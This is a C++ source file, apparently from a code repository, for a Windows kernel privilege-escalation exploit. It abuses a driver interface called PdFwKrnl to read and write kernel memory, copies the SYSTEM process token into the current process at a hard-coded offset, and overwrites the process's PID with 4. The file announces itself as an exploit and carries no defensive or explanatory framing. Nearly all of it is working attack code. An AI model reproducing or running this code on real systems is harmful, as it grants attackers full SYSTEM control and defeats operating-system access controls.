110 lines
3.4 KiB
C++
110 lines
3.4 KiB
C++
#include "PdFwKrnl.h"
|
|
|
|
typedef struct _EX_FAST_REF {
|
|
union {
|
|
VOID* Object;
|
|
ULONGLONG RefCnt : 4;
|
|
ULONGLONG Value;
|
|
};
|
|
}EX_FAST_REF, *PEX_FAST_REF;
|
|
|
|
int main(void) {
|
|
if (!pdfwkrnl::attach()) {
|
|
printf(STR("failed to attach to driver \n"));
|
|
return -1;
|
|
}
|
|
|
|
PVOID* ntoskrnl_object = nullptr;
|
|
PVOID* current_process_object = nullptr;
|
|
uint64_t current_process_pid = GetCurrentProcessId();
|
|
uint64_t ntoskrnl_pid = 4;
|
|
EX_FAST_REF ntoskrnl_token{};
|
|
EX_FAST_REF current_process_token{};
|
|
|
|
printf(STR("starting exploit \n"));
|
|
|
|
printf(STR("getting ntoskrnl object \n"));
|
|
|
|
pdfwkrnl::call_kernel_function<NTSTATUS>(pdfwkrnl::get_kernel_export("PsLookupProcessByProcessId"), (HANDLE)4, &ntoskrnl_object);
|
|
if (!ntoskrnl_object) {
|
|
printf(STR("failed to obtain ntoskrnl object \n"));
|
|
return pdfwkrnl::detach();
|
|
}
|
|
|
|
printf(STR("obtained ntoskrnl object @ %p \n"), ntoskrnl_object);
|
|
|
|
printf(STR("getting ntoskrnl token \n"));
|
|
|
|
ntoskrnl_token = pdfwkrnl::read<EX_FAST_REF>((uint64_t)ntoskrnl_object + 0x4b8);
|
|
if (!ntoskrnl_token.Object) {
|
|
printf(STR("failed to obtain ntoskrnl token \n"));
|
|
return pdfwkrnl::detach();
|
|
}
|
|
|
|
printf(STR("obtained ntoskrnl token | object @ %p \n"), ntoskrnl_token.Object);
|
|
|
|
printf(STR("current process pid %d \n"), current_process_pid);
|
|
printf(STR("ntoskrnl pid %d \n"), 4);
|
|
|
|
printf(STR("getting current process object \n"));
|
|
|
|
pdfwkrnl::call_kernel_function<NTSTATUS>(pdfwkrnl::get_kernel_export("PsLookupProcessByProcessId"), (HANDLE)current_process_pid, ¤t_process_object);
|
|
if (!current_process_object) {
|
|
printf(STR("failed to obtain current process object \n"));
|
|
return pdfwkrnl::detach();
|
|
}
|
|
|
|
printf(STR("obtained current process object @ %p \n"), current_process_object);
|
|
|
|
printf(STR("getting current process token \n"));
|
|
|
|
current_process_token = pdfwkrnl::read<EX_FAST_REF>((uint64_t)current_process_object + 0x4b8);
|
|
if (!current_process_token.Object) {
|
|
printf(STR("failed getting current process token \n"));
|
|
return pdfwkrnl::detach();
|
|
}
|
|
|
|
printf(STR("overwriting current process token with ntoskrnl's token \n"));
|
|
|
|
if (!pdfwkrnl::write((uint64_t)current_process_object + 0x4b8, &ntoskrnl_token, sizeof(EX_FAST_REF))) {
|
|
printf(STR("failed overwriting current process token \n"));
|
|
return pdfwkrnl::detach();
|
|
}
|
|
|
|
printf(STR("checking if overwrite was success \n"));
|
|
|
|
EX_FAST_REF current_process_token_temp = pdfwkrnl::read<EX_FAST_REF>((uint64_t)current_process_object + 0x4b8);
|
|
if (current_process_token_temp.Object != ntoskrnl_token.Object) {
|
|
printf(STR("failed overwriting current process token \n"));
|
|
return pdfwkrnl::detach();
|
|
}
|
|
|
|
printf(STR("token was successfully overwriten \n"));
|
|
|
|
printf(STR("overwriting current process's pid to ntoskrnl's \n"));
|
|
|
|
if (!pdfwkrnl::write((uint64_t)current_process_object + 0x440, &ntoskrnl_pid, sizeof(uint64_t))) {
|
|
printf(STR("failed overwriting current process pid to ntoskrnl's \n"));
|
|
return pdfwkrnl::detach();
|
|
}
|
|
|
|
printf(STR("checking if current process's pid was overwriten \n"));
|
|
|
|
if (pdfwkrnl::read<uint64_t>((uint64_t)current_process_object + 0x440) != ntoskrnl_pid) {
|
|
printf(STR("failed overwriting current process pid to ntoskrnl's \n"));
|
|
return pdfwkrnl::detach();
|
|
}
|
|
|
|
printf(STR("pid was successfully overwriten \n"));
|
|
|
|
printf(STR("hello to two ntoskrnl's lol \n"));
|
|
|
|
printf(STR("exploit complete bye (: \n"));
|
|
|
|
printf(STR("enter to exit \n"));
|
|
|
|
getchar();
|
|
|
|
return pdfwkrnl::detach();
|
|
}
|